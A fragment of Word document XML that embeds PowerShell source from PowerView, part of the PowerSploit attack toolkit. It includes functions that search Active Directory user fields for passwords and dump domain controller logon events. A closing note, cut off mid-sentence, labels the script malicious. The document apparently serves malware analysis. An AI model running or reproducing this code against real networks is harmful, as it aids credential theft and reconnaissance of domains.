      <w:r w:rsidRPr="00F17D05">
        <w:t>PageSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> | Select-Object -First 1 | Get-Member -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>MemberType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> *Property | Select-Object -Property 'Name' }}function Find-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>UserField</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> {&lt;# .SYNOPSIS Searches user object fields for a given word (default *pass*). Default field being searched is 'description'. Taken directly from @obscuresec's post: http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html .PARAMETER </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>SearchTerm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> Term to search for, default of \"pass\". .PARAMETER SearchField User field to search, default of \"description\". .PARAMETER </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>ADSpath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> The LDAP source to search through, e.g. \"LDAP://OU=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>secret,DC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>testlab,DC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve">=local\" Useful for OU queries. .PARAMETER Domain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>Domain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> to search computer fields for, defaults to the current domain. .PARAMETER </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>DomainController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> Domain controller to reflect LDAP queries through. .PARAMETER </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>PageSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>PageSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> to set for the LDAP searcher object. .EXAMPLE PS C:\\&gt; Find-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>UserField</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> -SearchField info -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>SearchTerm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> backup Find user accounts with \"backup\" in the \"info\" field.#&gt; [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>CmdletBinding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>()] param( [Parameter(Position=0,ValueFromPipeline=$True)] [String] $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>SearchTerm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> = 'pass', [String] $SearchField = 'description', [String] $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>ADSpath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>, [String] $Domain, [String] $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>DomainController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>, [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>ValidateRange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>(1,10000)] [Int] $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>PageSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> = 200 ) process { Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>NetUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>ADSpath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>ADSpath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> -Domain $Domain -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>DomainController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>DomainController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> -Filter \"($SearchField=*$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>SearchTerm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>*)\" -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>PageSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>PageSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> | Select-Object </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>samaccountname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>,$SearchField }}function Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>UserEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> {&lt;# .SYNOPSIS Dump and parse security events relating to an account logon (ID 4624) or a TGT request event (ID 4768). Intended to be used and tested on Windows 2008 Domain Controllers. Admin </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>Reqd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve">? YES </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17D05">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Author: @sixdub .PARAMETER </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>ComputerName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> The computer to get events from. Default: Localhost .PARAMETER </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>EventType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> Either 'logon', '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>tgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve">', or 'all'. Defaults: 'logon' .PARAMETER </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>DateStart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> Filter out all events before this date. Default: 5 days .EXAMPLE PS C:\\&gt; Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>UserEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>ComputerName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>DomainController.testlab.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> .LINK http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/#&gt; Param( [String] $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>ComputerName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>Env:ComputerName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>, [String] [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>ValidateSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>(\"logon\",\"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>tgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>\",\"all\")] $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>EventType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> = \"logon\", [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>DateTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>] $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>DateStart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>=[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>DateTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>Today.AddDays</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>(-5) ) if($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>EventType.ToLower</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>() -like \"logon\") { [Int32[]]$ID = @(4624) } elseif($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>EventType.ToLower</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>() -like \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>tgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>\") { [Int32[]]$ID = @(4768) } else { [Int32[]]$ID = @(4624, 4768) } #grab all events matching our filter for the specified host Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>WinEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>ComputerName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>ComputerName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>FilterHashTable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> @{ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>LogName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> = 'Security'; ID=$ID; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>StartTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>=$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>DateStart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>} -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>ForEach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>-Object { if($ID -contains 4624) { # first parse and check the logon event type. This could be later adapted and tested for RDP logons (type 10) if($_.message -match '(?s)(?&lt;=Logon Type:).*?(?=(Impersonation Level:|New Logon:))') { if($Matches) { $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>LogonType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> = $Matches[0].trim() $Matches = $Null } } else { $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>LogonType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> = \"\" } # interactive logons or domain logons if (($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>LogonType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>eq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> 2) -or ($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>LogonType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>eq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> 3)) { try { # parse and store the account used and the address they came from if($_.message -match '(?s)(?&lt;=New Logon:).*?(?=Process Information:)') { if($Matches) { $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>UserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> = $Matches[0].split(\"`n\")[2].split(\":\")[1].trim() $Domain = $Matches[0].split(\"`n\")[3].split(\":\")[1].trim() $Matches = $Null } } if($_.message -match '(?s)(?&lt;=Network Information:).*?(?=Source Port:)') { if($Matches) { $Address = $Matches[0].split(\"`n\")[2].split(\":\")[1].trim() $Matches = $Null } } # only add if there was account information not for a machine or anonymous logon if ($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>UserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> -and (-not $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>UserName.endsWith</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>('$')) -and ($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>UserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> -ne 'ANONYMOUS LOGON')) { $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>LogonEventProperties</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> = @{ 'Domain' = $Domain '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>ComputerName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>' = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>ComputerName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> 'Username' = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>UserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> 'Address' = $Address 'ID' = '4624' '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>LogonType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>' = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>LogonType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> 'Time' = $_.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>TimeCreated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> } New-Object -TypeName </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>PSObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> -Property $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>LogonEventProperties</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> } } catch { Write-Debug \"Error parsing event logs: $_\" } } } if($ID -contains 4768) { # the TGT event type try { if($_.message -match '(?s)(?&lt;=Account Information:).*?(?=Service Information:)') { if($Matches) { $Username = $Matches[0].split(\"`n\")[1].split(\":\")[1].trim() $Domain = $Matches[0].split(\"`n\")[2].split(\":\")[1].trim() $Matches = $Null } } if($_.message -match '(?s)(?&lt;=Network Information:).*?(?=Additional Information:)') { if($Matches) { $Address = $Matches[0].split(\"`n\")[1].split(\":\")[-1].trim() $Matches = $Null } } $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>LogonEventProperties</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> = @{ 'Domain' = $Domain '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>ComputerName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>' = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>ComputerName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> 'Username' = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>UserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> 'Address' = $Address 'ID' = '4768' '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>LogonType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>' = '' 'Time' = $_.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>TimeCreated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> } New-Object -TypeName </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>PSObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> -Property $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>LogonEventProperties</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> } catch { Write-Debug \"Error parsing event logs: $_\" } } }}function Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>ObjectAcl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> {&lt;# .SYNOPSIS Returns the ACLs associated with a specific active directory object. Thanks Sean Metcalf (@pyrotek3) for the idea and guidance. .PARAMETER </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>SamAccountName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> Object name to filter for. .PARAMETER Name Object name to filter for. .PARAMETER </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>DistinguishedName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> Object distinguished name to filter for. .PARAMETER </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>ResolveGUIDs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> Switch. Resolve GUIDs to their display names. .PARAMETER Filter A customized </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> filter string to use, e.g. \"(description=*admin*)\" .PARAMETER </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>ADSpath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3467A5C4" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>THIS SCRIPT IS MALICIOUS</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> is NOT a legitimate Windows script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074F16F0" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve">It is part of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerSploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve">, a well-known </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>post-exploitation / attack toolkit</w:t>
